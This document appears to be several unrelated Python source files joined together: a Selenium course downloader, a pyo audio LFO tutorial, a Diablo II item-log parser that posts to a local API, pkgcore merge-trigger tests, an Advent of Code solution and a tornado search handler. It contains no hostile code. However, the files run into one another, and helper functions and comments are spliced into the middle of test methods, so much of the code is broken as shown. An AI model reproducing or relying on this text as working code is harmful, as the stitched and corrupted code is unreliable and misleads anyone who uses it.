out_dir = os.path.abspath(sys.argv[1]).rstrip("/") + "/" # Get username from user. username = ask_user("Username?") password = ask_user("Password?") # Create a new webdriver. logging.info("Booting...") prefs = {"download.default_directory": out_dir} options = webdriver.ChromeOptions() options.add_argument("--disable-dev-shm-usage") options.add_argument("--no-sandbox") options.add_experimental_option('prefs', prefs) driver = webdriver.Chrome(executable_path="./chromedriver", chrome_options=options) logging.info("Authenticating...") login(driver, username, password) logging.info("Getting courses...") courses = get_courses(driver) logging.info(f"Found {len(courses)} courses. (They are: {str(courses)})") for ci, course in enumerate(courses): logging.info(f"Downloading {ci + 1}/{len(courses)}") download_documents(driver, course) download_student_publications(driver, course) download_dropbox(driver, course) logging.info("Done!") 0 """ 04-building-lfo.py - Audio control of parameters. One of the most important thing with computer music is the trajectories taken by parameters over time. This is what gives life to the synthesized sound. One way to create moving values is by connecting a low frequency oscillator to an object's attribute. This script shows that process. Other possibilities that will be covered later use random class objects or feature extraction from an audio signal. """ from pyo import * s = Server().boot() # Creates a noise source n = Noise() # Creates an LFO oscillating +/- 500 around 1000 (filter's frequency) lfo1 = Sine(freq=0.1, mul=500, add=1000) # Creates an LFO oscillating between 2 and 8 (filter's Q) lfo2 = Sine(freq=0.4).range(2, 8) # Creates a dynamic bandpass filter applied to the noise source bp1 = ButBP(n, freq=lfo1, q=lfo2).out() # The LFO object provides more waveforms than just a sine wave # Creates a ramp oscillating +/- 1000 around 12000 (filter's frequency) lfo3 = LFO(freq=0.25, type=1, mul=1000, add=1200) # Creates a square oscillating between 4 and 12 (filter's Q) lfo4 = LFO(freq=4, type=2).range(4, 12) # Creates a second dynamic bandpass filter applied to the noise source bp2 = ButBP(n, freq=lfo3, q=lfo4).out(1) s.gui(locals()) DavFount/D2BSItemLog-Parser # --------------------------- # D2BS: Item Logger # --------------------------- # edit your profile.js to enable item logging, example: # # Config.ItemInfo = true; // Log stashed, skipped (due to no space) or sold items. 
# Config.ItemInfoQuality = [6, 7, 8]; # # 6, 7, 8 reprensent item quality to be logged to itemlog file # lowquality = 1 # normal = 2 # superior = 3 # magic = 4 # set = 5 # rare = 6 # unique = 7 # crafted = 8 import json import os import requests import time import random import re import string from getpass import getpass print('Hello!') # API Webhook api_url = 'http://localhost:3000/api/v1/items' api_login_url = 'http://localhost:3000/api/v1/login' api_token = '' # path to itemlog.txt (remember to escape) # c:\users\bob\ ==> should be ==> c:\\users\\bob\\ itemlog = 'P:\\d2bs2\\trunk\\d2bs\\kolbot\\logs\\ItemLog.txt' # limit of lines in itemlog.txt before we try to empty it # if this gets too big it might stall your system itemlog_max_lines = 5000 # sleep time in seconds between each check of itemlog.txt sleep_between_checks = 30 # actions to post # valid actions: # 'Sold', 'Shopped', 'Gambled', 'Dropped', 'No room for' # 'Kept', 'Field Kept', 'Runeword Kept', 'Cubing Kept' always_actions = ['Sold', 'Shopped', 'Gambled', 'Dropped', 'No room for', 'Kept', 'Field Kept', 'Runeword Kept', 'Cubing Kept'] # == END OF SETTINGS == def send_to_api(itemInfo): headers = {'Content-Type': 'application/json', 'Authorization': 'Bearer ' + api_token} payload = json.dumps(itemInfo, indent=4) r = requests.post(api_url, data=payload, headers=headers) def login(userInfo): headers = {'Content-Type': 'application/json'} payload = json.dumps(userInfo, indent=4) r = requests.post(api_login_url, data=payload, headers=headers) json_r = r.json() global api_token api_token = json_r['token'] if(api_token): print(f'You are logged now logged in as {json_r["result"]["name"]}.') main() def generate_event_id(n): id = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(n)) return id def empty_logfile(): try: with open(itemlog, 'w'): return True except: return False def main(): current_line = 0 while True: try: with open(itemlog) as f: lines = f.readlines() except: print( f'[FAIL] failed to open itemlog - retrying in {sleep_between_checks} seconds..') time.sleep(sleep_between_checks) continue if current_line == 0: current_line = len(lines)-10 continue for idx, line in enumerate(lines): if idx >= current_line: regex = r'\[(.+?)\] <(.+?)> <(.+?)> <(.+?)> <(.+?)> <(.+?)> \((.+?)\) (.+?)$|$' match = re.search(regex, line) if match: timestamp = match.group(1) profile = match.group(2) character = match.group(3) difficulty = match.group(4) area = match.group(5) action = match.group(6) quality = match.group(7) dateTime = timestamp.split(' ') item = match.group(8) itemArray = [] itemStats = [] itemName = '' # Item has additional stats if '|' in item: itemArray = item.split(' | ') # Cost is found and ignored. 
The item stats start at the third element of the array if 'cost' in itemArray[0].lower(): itemName = itemArray[1] itemStats = itemArray[2:] itemStats = list(filter(None, itemStats)) # Cost is not found and the item stats begin at the second element of the array else: itemName = itemArray[0] itemStats = itemArray[1:] itemStats = list(filter(None, itemStats)) # No additional stats and the item name is present in group 6 else: itemName = item # Check to see if the action is enabled to log (Default: All) if action not in always_actions: continue # Generate a unique ID for a Database event_id = generate_event_id(8) # Send to the API send_to_api(itemInfo={ "date": dateTime[0], "time": dateTime[1], "profile": profile, "character": character, "difficulty": difficulty, "area": area, "action": action, "quality": quality, "itemName": itemName, "stats": itemStats }) else: print(f'Unable to parse {line}.') current_line = len(lines) if current_line >= itemlog_max_lines: print(f'[WARN] itemlog is {current_line} lines - emptying..') if empty_logfile(): current_line = 0 print('[OK] itemlog is now empty') else: print('[FAIL] failed to wipe itemlog!!') print( f'[OK] done checking itemlog - sleeping for {sleep_between_checks} seconds..') time.sleep(sleep_between_checks) def promptLogin(): username = input('Enter your username: ') password = getpass('Enter your password (input hidden): ') login(userInfo={ "name": username, "password": password }) if __name__ == '__main__': print(f'[START] Greetings! :-)') print(f'[OK] logfile: {itemlog}') print(f'------------') promptLogin() 1-10 # Copyright: 2007-2011 <> # License: GPL2/BSD from itertools import izip from math import floor, ceil import os import shutil import time from snakeoil.currying import post_curry from snakeoil.osutils import pjoin, ensure_dirs, normpath from snakeoil.test import mixins from pkgcore import spawn from pkgcore.fs import fs from pkgcore.merge import triggers, const from pkgcore.fs.contents import contentsSet from pkgcore.fs.livefs import gen_obj, scan from pkgcore.test import TestCase, SkipTest from pkgcore.test.merge.util import fake_trigger, fake_engine, fake_reporter class TestBase(TestCase): kls = fake_trigger def mk_trigger(self, kls=None, **kwargs): if kls is None: kls = self.kls return kls(**kwargs) def test_default_attrs(self): for x in ("required_csets", "_label", "_hooks", "_engine_types"): self.assertEqual(None, getattr(self.kls, x), msg="%s must exist and be None" % x) self.assertEqual(50, self.kls.priority) def test_label(self): self.assertEqual(self.mk_trigger().label, str(self.kls.__name__)) self.assertEqual(fake_trigger().label, str(fake_trigger.__name__)) self.assertEqual(fake_trigger(_label='foon').label, 'foon') def test_localize(self): o = self.mk_trigger() self.assertEqual(o, o.localize(None)) def test_get_required_csets(self): self.assertEqual(fake_trigger(required_csets=None).get_required_csets( None), None) self.assertEqual(fake_trigger(required_csets=None).get_required_csets( 1), None) self.assertEqual(fake_trigger(required_csets=None).get_required_csets( ""), None) o = fake_trigger(required_csets={"foo":["dar"], "bar":1}) self.assertEqual(o.get_required_csets("foo"), ["dar"]) self.assertEqual(o.get_required_csets("bar"), 1) self.assertEqual(fake_trigger(required_csets=("dar", "foo")) .get_required_csets("bar"), ("dar", "foo")) self.assertEqual(fake_trigger(required_csets=()) .get_required_csets(""), ()) def test_register(self): engine = fake_engine(mode=1) self.assertRaises(TypeError, 
self.mk_trigger(mode=1).register, engine) self.assertRaises(TypeError, self.mk_trigger(mode=1, _hooks=2).register, engine) self.assertFalse(engine._triggers) # shouldn't puke. o = self.mk_trigger(mode=1, _hooks=("2")) o.register(engine) self.assertEqual(engine._triggers, [('2', o, None)]) engine._triggers = [] # verify it's treating "all csets" differently from "no csets" o = self.mk_trigger(mode=1, _hooks=("2"), required_csets=()) o.register(engine) self.assertEqual(engine._triggers, [('2', o, ())]) # should handle keyerror thrown from the engine for missing hooks. engine = fake_engine(mode=1, blocked_hooks=("foon", "dar")) self.mk_trigger(mode=1, _hooks="foon").register(engine) self.mk_trigger(mode=1, _hooks=("foon", "dar")).register(engine) self.assertFalse(engine._triggers) o = self.mk_trigger(mode=1, _hooks=("foon", "bar"), required_csets=(3,)) o.register(engine) self.assertEqual(engine._triggers, [('bar', o, (3,))]) engine._triggers = [] o = self.mk_trigger(mode=1, _hooks="bar", required_csets=None) o.register(engine) self.assertEqual(engine._triggers, [('bar', o, None)]) def test_call(self): # test "I want all csets" def get_csets(required_csets, csets, fallback=None): o = self.mk_trigger(required_csets={1:required_csets, 2:fallback}, mode=(1,)) engine = fake_engine(csets=csets, mode=1) o(engine, csets) self.assertEqual([x[0] for x in o._called], [engine]*len(o._called)) return [list(x[1:]) for x in o._called] d = object() self.assertEqual(get_csets(None, d, [1]), [[d]], msg="raw csets mapping should be passed through without conversion" " for required_csets=None") self.assertEqual(get_csets([1,2], {1:1,2:2}), [[1, 2]], msg="basic mapping through failed") self.assertEqual(get_csets([], {}), [[]], msg="for no required csets, must have no args passed") class test_module(TestCase): def test_constants(self): self.assertEqual(sorted([const.REPLACE_MODE, const.UNINSTALL_MODE]), sorted(triggers.UNINSTALLING_MODES)) self.assertEqual(sorted([const.REPLACE_MODE, const.INSTALL_MODE]), sorted(triggers.INSTALLING_MODES)) class Test_mtime_watcher(mixins.TempDirMixin, TestCase): kls = triggers.mtime_watcher def test_identification(self): o = [gen_obj(self.dir)] t = self.kls() t.set_state([self.dir]) self.assertEqual(list(t.saved_mtimes), o) open(pjoin(self.dir, 'file'), 'w').close() t.set_state([self.dir, pjoin(self.dir, 'file')]) self.assertEqual(list(t.saved_mtimes), o) loc = pjoin(self.dir, 'dir') os.mkdir(loc) o.append(gen_obj(pjoin(self.dir, 'dir'))) o.sort() t.set_state([x.location for x in o]) self.assertEqual(sorted(t.saved_mtimes), o) # test syms. src = pjoin(self.dir, 'dir2') os.mkdir(src) loc = pjoin(self.dir, 'foo') os.symlink(src, loc) locs = [x.location for x in o] # insert a crap location to ensure it handles it. locs.append(pjoin(self.dir, "asdfasdfasdfasfdasdfasdfasdfasdf")) locs.append(src) i = gen_obj(src, stat=os.stat(src)) o.append(i) o.sort() t.set_state(locs) self.assertEqual(sorted(t.saved_mtimes), o) locs[-1] = loc o.remove(i) i = i.change_attributes(location=loc) o.append(i) o.sort() t.set_state(locs) self.assertEqual(sorted(t.saved_mtimes), o) o.remove(i) os.rmdir(src) # check stat_func usage; if lstat, the sym won't be derefed, # thus ignored. t.set_state(locs, stat_func=os.lstat) self.assertEqual(sorted(t.saved_mtimes), o) open(pjoin(self.dir, 'bar'), 'w').close() self.assertTrue(t.check_state()) # test dead sym filtering for stat. 
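# Added illustration of the stat_func distinction used above: os.stat()
# follows symlinks, while os.lstat() reports on the link itself, so passing
# stat_func=os.lstat means a symlink's target is never consulted
# (paths below are placeholders).
#
#   os.symlink('/tmp/target_dir', '/tmp/link')
#   os.stat('/tmp/link').st_mtime    # mtime of the target directory
#   os.lstat('/tmp/link').st_mtime   # mtime of the symlink itself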
t.set_state(locs) self.assertEqual(sorted(t.saved_mtimes), o) self.assertFalse(t.check_state()) def test_float_mtime(self): t = self.kls() t.set_state([self.dir]) l = list(t.saved_mtimes) self.assertEqual(len(l), 1) l = l[0] # mtime *must* be a float. self.assertInstance(l.mtime, float) def test_race_protection(self): # note this isn't perfect- being a race, triggering it on # demand is tricky. # hence the 10x loop; can trigger it pretty much each loop # for my 1ghz, so... it's a start. # the race specifically will only rear its head on extremely # fast io (crazy hardware, or async mount), fs's lacking subsecond, # and just severely crappy chance. # faster the io actions, easier it is to trigger. t = self.kls() for x in xrange(100): now = ceil(time.time()) + 1 os.utime(self.dir, (now + 100, now + 100)) t.set_state([self.dir]) now, st_mtime = time.time(), os.stat(self.dir).st_mtime now, st_mtime = ceil(now), floor(st_mtime) self.assertTrue(now > st_mtime, msg="%r must be > %r" % (now, st_mtime)) def castrate_trigger(base_kls, **kwargs): class castrated_trigger(base_kls): enable_regen = False def __init__(self, *args2, **kwargs2): self._passed_in_args = [] base_kls.__init__(self, *args2, **kwargs2) def regen(self, *args): self._passed_in_args.append(list(args)) if self.enable_regen: return base_kls.regen(self, *args) return [] locals().update(kwargs) return castrated_trigger class trigger_mixin(mixins.TempDirMixin): def setUp(self): mixins.TempDirMixin.setUp(self) self.reset_objects() def reset_objects(self, mode=const.INSTALL_MODE): self.engine = fake_engine(offset=self.dir, mode=mode) self.trigger = self.kls() def assertPaths(self, expected, tested): expected = sorted(expected) tested = sorted(tested) self.assertEqual(expected, tested, msg="expected %r, got %r" % (expected, tested)) class Test_ldconfig(trigger_mixin, TestCase): # use the kls indirection for when *bsd version of ldconfig trigger # is derived; will be pretty much the same, sans the trigger call. kls = castrate_trigger(triggers.ldconfig) def test_read_ld_so_conf(self): # test the defaults first. should create etc and the file. self.assertPaths(self.trigger.read_ld_so_conf(self.dir), [pjoin(self.dir, x) for x in self.trigger.default_ld_path]) o = gen_obj(pjoin(self.dir, 'etc')) self.assertEqual(o.mode, 0755) self.assertTrue(fs.isdir(o)) self.assertTrue(os.path.exists(pjoin(self.dir, 'etc/ld.so.conf'))) # test normal functioning. with open(pjoin(self.dir, 'etc/ld.so.conf'), 'w') as f: f.write("\n".join(["/foon", "dar", "blarnsball", "#comment"])) self.assertPaths(self.trigger.read_ld_so_conf(self.dir), [pjoin(self.dir, x) for x in ["foon", "dar", "blarnsball"]]) def assertTrigger(self, touches, ran, dirs=['test-lib', 'test-lib2'], hook='merge', mode=const.INSTALL_MODE, mkdirs=True, same_mtime=False): # wipe whats there. for x in scan(self.dir).iterdirs(): if x.location == self.dir: continue shutil.rmtree(x.location) for x in scan(self.dir).iterdirs(True): os.unlink(x.location) ensure_dirs(pjoin(self.dir, "etc")) with open(pjoin(self.dir, "etc/ld.so.conf"), "w") as f: f.write("\n".join('/' + x for x in dirs)) # force directory mtime to 1s less. 
past = time.time() - 10.0 if mkdirs: for x in dirs: ensure_dirs(pjoin(self.dir, x)) os.utime(pjoin(self.dir, x), (past, past)) self.reset_objects() self.engine.phase = 'pre_%s' % hook self.engine.mode = mode self.trigger(self.engine, {}) self.assertFalse(self.trigger._passed_in_args) resets = set() for x in touches: fp = pjoin(self.dir, x.lstrip('/')) open(pjoin(fp), "w").close() if same_mtime: os.utime(fp, (past, past)) resets.add(os.path.dirname(fp)) for x in resets: os.utime(x, (past, past)) self.engine.phase = 'post_%s' % hook self.trigger(self.engine, {}) self.assertEqual([[getattr(x, 'offset', None) for x in y] for y in self.trigger._passed_in_args], [[self.dir]]) def test_trigger(self): # ensure it doesn't explode for missing dirs. #self.assertTrigger([], False, mkdirs=False) #self.assertTrigger([], False) self.assertTrigger(['test-lib/foon'], True) self.assertTrigger(['test-lib/foon'], False, same_mtime=True) class TestInfoRegen(trigger_mixin, TestCase): raw_kls = triggers.InfoRegen @property def kls(self): return castrate_trigger(self.raw_kls, locations=['/']) info_data = \ """INFO-DIR-SECTION Network Applications START-INFO-DIR-ENTRY * Wget: (wget). The non-interactive network downloader. END-INFO-DIR-ENTRY """ def reset_objects(self, **kwargs): trigger_mixin.reset_objects(self, **kwargs) self.trigger.location = [self.dir] def test_binary_path(self): existing = os.environ.get("PATH", self) try: try: path = spawn.find_binary('install-info') except spawn.CommandNotFound: path = None self.assertEqual(path, self.trigger.get_binary_path()) if path is not self: os.environ["PATH"] = "" self.assertEqual(None, self.trigger.get_binary_path()) finally: if existing is self: os.environ.pop("PATH", None) else: os.environ["PATH"] = existing def test_regen(self): o = self.raw_kls() path = o.get_binary_path() if path is None: raise SkipTest("can't verify regen behaviour due to install-info " "not being available") # test it without the directory existing. self.assertEqual(list(o.regen(path, pjoin(self.dir, 'foo'))), []) self.assertFalse(os.path.exists(pjoin(self.dir, 'foo'))) with open(pjoin(self.dir, "foo.info"), 'w') as f: f.write(self.info_data) # no issues. self.assertEqual(list(o.regen(path, self.dir)), []) self.assertTrue(os.path.exists(pjoin(self.dir, 'dir')), msg="info dir file wasn't created") # drop the last line, verify it returns that file. with open(pjoin(self.dir, "foo2.info"), 'w') as f: f.write('\n'.join(self.info_data.splitlines()[:-1])) # should ignore \..* files open(pjoin(self.dir, ".foo.info"), 'w').close() os.unlink(pjoin(self.dir, 'dir')) self.assertEqual(list(o.regen(path, self.dir)), [pjoin(self.dir, 'foo2.info')]) self.assertTrue(os.path.exists(pjoin(self.dir, 'dir')), msg="info dir file wasn't created") def run_trigger(self, phase, expected_regen=[]): l = [] class foo: warn = staticmethod(l.append) self.engine.observer = foo() self.trigger._passed_in_args = [] self.engine.phase = phase self.trigger(self.engine, {}) self.assertEqual(map(normpath, (x[1] for x in self.trigger._passed_in_args)), map(normpath, expected_regen)) return l def test_trigger(self): if self.raw_kls().get_binary_path() is None: raise SkipTest( "can't verify regen behaviour due to install-info not being available") cur = os.environ.get("PATH", self) try: os.environ.pop("PATH", None) # shouldn't run if the binary is missing # although it should warn, and this code will explode when it does. 
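# The regen being stubbed out above normally shells out to install-info. A rough
# sketch of that kind of call (file filtering and error handling are
# illustrative only, not the InfoRegen trigger's actual code):
import os
import subprocess

def regen_info_dir(install_info_path, info_dir):
    """Run install-info for each info page in info_dir; return files that failed."""
    failures = []
    dir_file = os.path.join(info_dir, "dir")
    for name in os.listdir(info_dir):
        if name == "dir" or name.startswith("."):
            continue
        proc = subprocess.run(
            [install_info_path, "--quiet", f"--dir-file={dir_file}",
             os.path.join(info_dir, name)],
            capture_output=True, text=True)
        if proc.returncode != 0:
            failures.append(os.path.join(info_dir, name))
    return failures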
self.engine.phase = 'post_merge' self.assertEqual(None, self.trigger(self.engine, {})) finally: if cur is not self: os.environ["PATH"] = cur # verify it runs when dir is missing. # doesn't create the file since no info files. self.reset_objects() self.assertFalse(self.run_trigger('pre_merge', [])) self.assertFalse(self.run_trigger('post_merge', [self.dir])) # add an info, and verify it generated. with open(pjoin(self.dir, 'foo.info'), 'w') as f: f.write(self.info_data) self.reset_objects() self.trigger.enable_regen = True self.assertFalse(self.run_trigger('pre_merge', [])) self.assertFalse(self.run_trigger('post_merge', [self.dir])) # verify it doesn't; mtime is fine self.reset_objects() self.trigger.enable_regen = True self.assertFalse(self.run_trigger('pre_merge', [])) self.assertFalse(self.run_trigger('post_merge', [])) # verify it handles quoting properly, and that it ignores # complaints about duplicates. self.reset_objects() self.trigger.enable_regen = True self.assertFalse(self.run_trigger('pre_merge', [])) with open(pjoin(self.dir, "blaidd drwg.info"), "w") as f: f.write(self.info_data) self.assertFalse(self.run_trigger('post_merge', [self.dir])) # verify it passes back failures. self.reset_objects() self.trigger.enable_regen = True self.assertFalse(self.run_trigger('pre_merge', [])) with open(pjoin(self.dir, "tiza grande.info"), "w") as f: f.write('\n'.join(self.info_data.splitlines()[:-1])) l = self.run_trigger('post_merge', [self.dir]) self.assertEqual(len(l), 1) self.assertIn('tiza grande.info', l[0]) # verify it holds off on info regen till after unmerge for replaces. self.reset_objects(mode=const.REPLACE_MODE) self.assertFalse(self.run_trigger('pre_merge', [])) self.assertFalse(self.run_trigger('post_merge', [])) self.assertFalse(self.run_trigger('pre_unmerge', [])) os.unlink(pjoin(self.dir, "tiza grande.info")) self.assertFalse(self.run_trigger('post_unmerge', [self.dir])) class single_attr_change_base(object): kls = triggers.fix_uid_perms attr = None bad_val = 1 @staticmethod def good_val(val): return 2 def test_metadata(self): self.assertEqual(self.kls._engine_types, triggers.INSTALLING_MODES) self.assertEqual(self.kls.required_csets, ('new_cset',)) self.assertEqual(self.kls._hooks, ('pre_merge',)) @property def trigger(self): return self.kls(1, 2) def assertContents(self, cset=()): orig = sorted(cset) new = contentsSet(orig) self.trigger(fake_engine(mode=const.INSTALL_MODE), {'new_cset':new}) new = sorted(new) self.assertEqual(len(orig), len(new)) for x, y in izip(orig, new): self.assertEqual(orig.__class__, new.__class__) for attr in x.__attrs__: if self.attr == attr: val = getattr(x, attr) if self.bad_val is not None and val == self.bad_val: self.assertEqual(self.good_val(val), getattr(y, attr)) else: self.assertEqual(self.good_val(val), getattr(y, attr)) elif attr != 'chksums': # abuse self as unique singleton. 
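# The mode fix-ups verified by these assertions boil down to simple bit tests on
# st_mode. A standalone sketch of the "strip set-id bits from world-writable
# files" rule (mirrors the good_val used for fix_set_bits further down):
def strip_risky_set_bits(mode):
    """Drop setuid/setgid (and the world-write bit) when both are present."""
    if mode & 0o6000 and mode & 0o002:
        return mode & ~0o6002
    return mode

assert strip_risky_set_bits(0o4766) == 0o0764
assert strip_risky_set_bits(0o0644) == 0o0644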
self.assertEqual(getattr(x, attr, self), getattr(y, attr, self)) def test_trigger(self): self.assertContents() self.assertContents([fs.fsFile("/foon", mode=0644, uid=2, gid=1, strict=False)]) self.assertContents([fs.fsFile("/foon", mode=0646, uid=1, gid=1, strict=False)]) self.assertContents([fs.fsFile("/foon", mode=04766, uid=1, gid=2, strict=False)]) self.assertContents([fs.fsFile("/blarn", mode=02700, uid=2, gid=2, strict=False), fs.fsDir("/dir", mode=0500, uid=2, gid=2, strict=False)]) self.assertContents([fs.fsFile("/blarn", mode=02776, uid=2, gid=2, strict=False), fs.fsDir("/dir", mode=02777, uid=1, gid=2, strict=False)]) self.assertContents([fs.fsFile("/blarn", mode=06772, uid=2, gid=2, strict=False), fs.fsDir("/dir", mode=04774, uid=1, gid=1, strict=False)]) class Test_fix_uid_perms(single_attr_change_base, TestCase): kls = triggers.fix_uid_perms attr = 'uid' class Test_fix_gid_perms(single_attr_change_base, TestCase): kls = triggers.fix_gid_perms attr = 'gid' class Test_fix_set_bits(single_attr_change_base, TestCase): kls = triggers.fix_set_bits trigger = property(lambda self:self.kls()) attr = 'mode' @staticmethod def good_val(val): if val & 06000 and val & 0002: return val & ~06002 return val class Test_detect_world_writable(single_attr_change_base, TestCase): kls = triggers.detect_world_writable _trigger_override = None attr = 'mode' @property def trigger(self): if self._trigger_override is None: return self.kls(fix_perms=True) return self._trigger_override() def good_val(self, val): self.assertEqual(self._trigger_override, None, msg="bug in test code; good_val should not be invoked when a " "trigger override is in place.") return val & ~0002 def test_lazyness(self): # ensure it doesn't even look if it won't make noise, and no reporter # cset is intentionally *not* a contentset; it'll explode it it tries # to access it. self.kls().trigger(fake_engine(), None) # now verify that the explosion would occur if either settings are on. 
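# detect_world_writable's core check is just "mode & 0o002". A minimal sketch of
# that scan over plain (path, mode) pairs (the real trigger walks a contentsSet
# and reports through the engine's observer; names below are illustrative):
def find_world_writable(entries, fix_perms=False):
    """Yield (path, possibly-fixed mode) for every world-writable entry."""
    for path, mode in entries:
        if mode & 0o002:
            yield path, (mode & ~0o002) if fix_perms else mode

# e.g. list(find_world_writable([("/foon", 0o772), ("/far", 0o770)], fix_perms=True))
# -> [("/foon", 0o770)]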
self.assertRaises((AttributeError, TypeError), self.kls().trigger, fake_engine(observer=object()), None) self.assertRaises((AttributeError, TypeError), self.kls(fix_perms=True).trigger, fake_engine(), None) def test_observer_warn(self): warnings = [] engine = fake_engine(observer=fake_reporter(warn=warnings.append)) self._trigger_override = self.kls() def run(fs_objs, fix_perms=False): self.kls(fix_perms=fix_perms).trigger(engine, contentsSet(fs_objs)) run([fs.fsFile('/foon', mode=0770, strict=False)]) self.assertFalse(warnings) run([fs.fsFile('/foon', mode=0772, strict=False)]) self.assertEqual(len(warnings), 1) self.assertIn('/foon', warnings[0]) warnings[:] = [] run([fs.fsFile('/dar', mode=0776, strict=False), fs.fsFile('/bar', mode=0776, strict=False), fs.fsFile('/far', mode=0770, strict=False)]) self.assertEqual(len(warnings), 2) self.assertIn('/dar', ' '.join(warnings)) self.assertIn('/bar', ' '.join(warnings)) self.assertNotIn('/far', ' '.join(warnings)) class TestPruneFiles(TestCase): kls = triggers.PruneFiles def test_metadata(self): self.assertEqual(self.kls.required_csets, ('new_cset',)) self.assertEqual(self.kls._hooks, ('pre_merge',)) self.assertEqual(self.kls._engine_types, triggers.INSTALLING_MODES) def test_it(self): orig = contentsSet([ fs.fsFile('/cheddar', strict=False), fs.fsFile('/sporks-suck', strict=False), fs.fsDir('/foons-rule', strict=False), fs.fsDir('/mango', strict=False) ]) engine = fake_engine(mode=const.INSTALL_MODE) def run(func): new = contentsSet(orig) self.kls(func)(engine, {'new_cset':new}) return new self.assertEqual(orig, run(lambda s:False)) self.assertEqual([], run(post_curry(isinstance, fs.fsDir)).dirs()) self.assertEqual(sorted(orig.files()), sorted(run(post_curry(isinstance, fs.fsDir)).dirs(True))) # check noisyness. info = [] engine = fake_engine(observer=fake_reporter(info=info.append), mode=const.REPLACE_MODE) run(lambda s:False) self.assertFalse(info) run(post_curry(isinstance, fs.fsDir)) self.assertEqual(len(info), 2) # ensure only the relevant files show. self.assertNotIn('/cheddar', ' '.join(info)) self.assertNotIn('/sporks-suck', ' '.join(info)) self.assertIn('/foons-rule', ' '.join(info)) self.assertIn('/mango', ' '.join(info)) orhtej2/adventofcode2019/python/07/aoc2019_07/case02.py0 from functools import partial, partialmethod from . import amplifier class _ReachedOutput(Exception): def __init__(self, value): self.value = value def _func(value): raise _ReachedOutput(value) class Chain: def __init__(self, program, configuration): self.program = program self.configuration = configuration def __call__(self): amps = [amplifier.Amplifier(dict(self.program), self.configuration[i]) for i in range(5)] for i in range(5): amps[i].output = _func stage = 0 result = 0 while True: try: #print(f'Running stage {stage} with input {result}') amps[stage](result) return result except _ReachedOutput as e: #print(f'Got out, {e.value}') result = e.value stage += 1 stage %= 5 return resultimport json import logging from collections import OrderedDict from datetime import datetime import pkg_resources from tornado.locale import get_supported_locales from tornado.web import RequestHandler from . 
import pageutils from .bases import BaseHTMLHandler, BaseAPIHandler from .dispatch import DatabaseMixin, route from .models.indexer import db_expert, types from .models.mine_models import CardIndex, AccessoryIndex @route(r"/cards/search") class CardSearch(BaseHTMLHandler, DatabaseMixin): SUPPORTED_LANGS = ["en", "ja"] def indexes_for_lang(self): if self.locale.code in self.SUPPORTED_LANGS: code = self.locale.code else: code = self.SUPPORTED_LANGS[0] return [ self.static_url(f"search/card.base.{code}.json"), self.static_url(f"search/card.skills.enum.{code}.json"), self.static_url(f"search/card.presets.{code}.json"), ] def dictionary_for_lang(self): return self.static_url("search/dictionary.dummy.json") def get(self): self.render( "card_search_scaffold.html", config_indexes=self.indexes_for_lang(), config_dictionary=self.dictionary_for_lang(), ) @route(r"/api/private/search/cards/results.json") class CardSearchExec(BaseAPIHandler, DatabaseMixin): FIELD_BLACKLIST = ["release_dates"] INDEX = CardIndex DEFAULT_SORT = ("ordinal", True) def look_up_schema_field(self, field_name: str) -> types.Field: names = field_name.split(".") assert len(names) > 0 if names[0] in self.FIELD_BLACKLIST or field_name in self.FIELD_BLACKLIST: raise KeyError(names[0]) root = self.INDEX[names[0]] for name in names[1:]: root = root[name] return root def is_fts_table(self, field_name: str) -> bool: return field_name in self.INDEX.fts_bond_tables def _error(self, status, message): self.set_status(status) self.write({"error": message}) self.finish() async def post(self): try: query = json.loads(self.request.body) except json.JSONDecodeError: self.set_status(400) self.write({"error": "Invalid payload."}) return fts_bonds = {} clean_query_presort: List[Tuple[Iterable[int], str, dict]] = [] for field, value in query.items(): if field.startswith("_"): continue if self.is_fts_table(field): if value: fts_bonds[field] = ("card_fts_cfg_english", value) continue try: scmfield = self.look_up_schema_field(field) except KeyError: return self._error(400, f"Unknown field: {field}") behaviour = scmfield.behaviour or {} if scmfield.field_type == types.FIELD_TYPE_INT and ( scmfield.map_enum_to_id is not None or behaviour.get("captain_treat_as") == "enum" ): if behaviour.get("compare_type") == "bit-set": if isinstance(value, int): clean_query_presort.append((scmfield.order, field, {"value": [value]})) elif isinstance(value, list) and all(isinstance(x, int) for x in value): clean_query_presort.append( (scmfield.order, field, {"value": value, "exclude": True}) ) else: return self._error( 400, f"{field}: The value must be a list of integers, or a single integer, for bit-sets.", ) else: if not isinstance(value, int): return self._error(400, f"{field}: The value must be an integer.") clean_query_presort.append( (scmfield.order, field, {"value": value, "compare_type": "eq"}) ) elif scmfield.field_type == types.FIELD_TYPE_INT: if not isinstance(value, dict) or "compare_to" not in value: return self._error(400, f"{field}: Invalid integer payload.") value["value"] = value.pop("compare_to") clean_query_presort.append((scmfield.order, field, value)) elif ( scmfield.field_type == types.FIELD_TYPE_STRING or scmfield.field_type == types.FIELD_TYPE_STRINGMAX ): if not isinstance(value, str): return self._error(400, f"{field}: Invalid string payload.") clean_query_presort.append((scmfield.order, field, {"value": str(value)})) elif scmfield.field_type == types.FIELD_TYPE_DATETIME: try: clean_query_presort.append( (scmfield.order, field, {"value": 
datetime.fromisoformat(value)}) ) except ValueError: return self._error(400, f"{field}: Invalid format") clean_query_presort.sort(key=lambda x: x[0]) clean_query = OrderedDict(x[1:] for x in clean_query_presort) if "id" in clean_query: clean_query["id"]["return"] = True else: clean_query["id"] = {"return": True} clean_query.move_to_end("id", last=False) order_by = None order_desc = False sort_key = query.get("_sort") if sort_key: try: f = self.look_up_schema_field(sort_key[1:]) except KeyError: pass else: order_by = sort_key[1:] order_desc = True if sort_key[0] == "-" else False else: order_by, order_desc = self.DEFAULT_SORT if order_by in clean_query: clean_query[order_by]["return"] = True elif order_by: clean_query[order_by] = {"return": True} expert = db_expert.PostgresDBExpert(self.INDEX) async with self.database().pool.acquire() as connection, connection.transaction(): # We generate a lot of SQL when building queries. Assuming there will eventually # be a few injection bugs, set this to try and prevent some of the damage. await connection.execute("SET TRANSACTION READ ONLY") res = await expert.run_query(connection, clean_query, fts_bonds, order_by, order_desc) self.write({"result": [r["id"] for r in res]}) @route(r"/accessories/search") class AccessorySearch(BaseHTMLHandler, DatabaseMixin): SUPPORTED_LANGS = ["en"] def indexes_for_lang(self): if self.locale.code in self.SUPPORTED_LANGS: code = self.locale.code else: code = self.SUPPORTED_LANGS[0] return [ self.static_url(f"search/accessory.base.{code}.json"), self.static_url(f"search/accessory.skills.enum.{code}.json"), ] def dictionary_for_lang(self): return self.static_url("search/dictionary.dummy.json") def get(self): self.render( "accessory_search_scaffold.html", 